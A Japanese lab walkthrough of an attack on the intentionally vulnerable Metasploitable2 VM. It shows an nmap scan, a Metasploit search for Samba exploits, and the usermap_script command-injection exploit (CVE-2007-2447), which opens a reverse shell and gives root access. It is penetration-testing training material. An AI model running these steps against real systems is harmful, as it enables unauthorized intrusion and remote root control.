Metasploit(Samba コマンドインジェクション)

Metasploit コンソールの起動

root@kali:~# service postgresql start
root@kali:~# msfdb init
[i] Database already started
[i] The database appears to be already configured, skipping initialization
root@kali:~# msfconsole
 ~(中略)~
       =[ metasploit v5.0.38-dev                          ]
+ -- --=[ 1912 exploits - 1073 auxiliary - 329 post       ]
+ -- --=[ 545 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 3 evasion                                       ]

msf5 > 

Metasploitable2 のオープンポートを調べてみる。

msf5 > nmap -P0-65535 192.168.56.105 (← ポート番号 0 ~ 65535 を全部検索)
[*] exec: nmap -P0-65536 192.168.56.105

Starting Nmap 7.70 ( https://nmap.org ) at 2019-09-08 00:40 JST
Nmap scan report for 192.168.56.105
Host is up (0.00045s latency).
Not shown: 977 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
23/tcp   open  telnet
25/tcp   open  smtp
53/tcp   open  domain
80/tcp   open  http
111/tcp  open  rpcbind
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
512/tcp  open  exec
513/tcp  open  login
514/tcp  open  shell
1099/tcp open  rmiregistry
1524/tcp open  ingreslock
2049/tcp open  nfs
2121/tcp open  ccproxy-ftp
3306/tcp open  mysql
5432/tcp open  postgresql
5900/tcp open  vnc
6000/tcp open  X11
6667/tcp open  irc
8009/tcp open  ajp13
8180/tcp open  unknown
MAC Address: 08:00:27:79:45:E8 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 0.31 seconds

Samba によりWindowsとのファイル共有に用いられる netbios 及び microsoft directory service が動作してることが分かる。

JVNDB-2007-000374 - JVN iPedia - 脆弱性対策情報データベース
「Samba におけるコマンドインジェクションの脆弱性
Samba にはユーザからの RPC メッセージの入力を適切に処理せず /bin/sh に渡す問題があります。結果として、遠隔の第三者により任意のコマンドを実行される可能性があります。

Metasploit で Samba に関するエクスプロイトがあるか調べる。

msf5 > search samba

Matching Modules
================

   #   Name                                                 Disclosure Date  Rank       Check  Description
   -   ----                                                 ---------------  ----       -----  -----------
   0   auxiliary/admin/smb/samba_symlink_traversal                           normal     No     Samba Symlink Directory Traversal
   1   auxiliary/dos/samba/lsa_addprivs_heap                                 normal     No     Samba lsa_io_privilege_set Heap Overflow
   2   auxiliary/dos/samba/lsa_transnames_heap                               normal     No     Samba lsa_io_trans_names Heap Overflow
   3   auxiliary/dos/samba/read_nttrans_ea_list                              normal     No     Samba read_nttrans_ea_list Integer Overflow
   4   auxiliary/scanner/rsync/modules_list                                  normal     Yes    List Rsync Modules
   5   auxiliary/scanner/smb/smb_uninit_cred                                 normal     Yes    Samba _netr_ServerPasswordSet Uninitialized Credential State
   6   exploit/freebsd/samba/trans2open                     2003-04-07       great      No     Samba trans2open Overflow (*BSD x86)
   7   exploit/linux/samba/chain_reply                      2010-06-16       good       No     Samba chain_reply Memory Corruption (Linux x86)
   8   exploit/linux/samba/is_known_pipename                2017-03-24       excellent  Yes    Samba is_known_pipename() Arbitrary Module Load
   9   exploit/linux/samba/lsa_transnames_heap              2007-05-14       good       Yes    Samba lsa_io_trans_names Heap Overflow
   10  exploit/linux/samba/setinfopolicy_heap               2012-04-10       normal     Yes    Samba SetInformationPolicy AuditEventsInfo Heap Overflow
   11  exploit/linux/samba/trans2open                       2003-04-07       great      No     Samba trans2open Overflow (Linux x86)
   12  exploit/multi/samba/nttrans                          2003-04-07       average    No     Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow
   13  exploit/multi/samba/usermap_script                   2007-05-14       excellent  No     Samba "username map script" Command Execution
   14  exploit/osx/samba/lsa_transnames_heap                2007-05-14       average    No     Samba lsa_io_trans_names Heap Overflow
   15  exploit/osx/samba/trans2open                         2003-04-07       great      No     Samba trans2open Overflow (Mac OS X PPC)
   16  exploit/solaris/samba/lsa_transnames_heap            2007-05-14       average    No     Samba lsa_io_trans_names Heap Overflow
   17  exploit/solaris/samba/trans2open                     2003-04-07       great      No     Samba trans2open Overflow (Solaris SPARC)
   18  exploit/unix/http/quest_kace_systems_management_rce  2018-05-31       excellent  Yes    Quest KACE Systems Management Command Injection
   19  exploit/unix/misc/distcc_exec                        2002-02-01       excellent  Yes    DistCC Daemon Command Execution
   20  exploit/unix/webapp/citrix_access_gateway_exec       2010-12-21       excellent  Yes    Citrix Access Gateway Command Execution
   21  exploit/windows/fileformat/ms14_060_sandworm         2014-10-14       excellent  No     MS14-060 Microsoft Windows OLE Package Manager Code Execution
   22  exploit/windows/http/sambar6_search_results          2003-06-21       normal     Yes    Sambar 6 Search Results Buffer Overflow
   23  exploit/windows/license/calicclnt_getconfig          2005-03-02       average    No     Computer Associates License Client GETCONFIG Overflow
   24  exploit/windows/smb/group_policy_startup             2015-01-26       manual     No     Group Policy Script Execution From Shared Resource
   25  post/linux/gather/enum_configs                                        normal     No     Linux Gather Configurations

13 exploit/multi/samba/usermap_script を使ってみる。

msf5 > info exploit/multi/samba/usermap_script

       Name: Samba "username map script" Command Execution
     Module: exploit/multi/samba/usermap_script
   Platform: Unix
       Arch: cmd
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2007-05-14

Provided by:
  jduck 

Available targets:
  Id  Name
  --  ----
  0   Automatic

Check supported:
  No

Basic options:
  Name    Current Setting  Required  Description
  ----    ---------------  --------  -----------
  RHOSTS                   yes       The target address range or CIDR identifier
  RPORT   139              yes       The target port (TCP)

Payload information:
  Space: 1024

Description:
  This module exploits a command execution vulnerability in Samba 
  versions 3.0.20 through 3.0.25rc3 when using the non-default 
  "username map script" configuration option. By specifying a username 
  containing shell meta characters, attackers can execute arbitrary 
  commands. No authentication is needed to exploit this vulnerability 
  since this option is used to map usernames prior to authentication!

References:
  https://cvedetails.com/cve/CVE-2007-2447/
  OSVDB (34700)
  http://www.securityfocus.com/bid/23972
  http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=534
  http://samba.org/samba/security/CVE-2007-2447.html

エクスプロイトを使用する。リモートホストの設定。

msf5 > use exploit/multi/samba/usermap_script
msf5 exploit(multi/samba/usermap_script) > set RHOST 192.168.56.105
RHOST => 192.168.56.105
msf5 exploit(multi/samba/usermap_script) > exploit 

[*] Started reverse TCP double handler on 192.168.56.106:4444 
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo LobabiCRpIvAL9ia;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "LobabiCRpIvAL9ia\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.56.106:4444 -> 192.168.56.105:57740) at 2019-09-08 00:54:53 +0900

id (← コマンド入力)
uid=0(root) gid=0(root)
uname -a (← コマンド入力)
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux (← Metasploitable2 に侵入できている)

終了する。

^C (← Ctrl + C)
Abort session 1? [y/N]  y
""
[*] 192.168.56.105 - Command shell session 1 closed.  Reason: User exit
msf5 exploit(multi/samba/usermap_script) > back
msf5 > exit
root@kali:~# 
/* -----codeの行番号----- */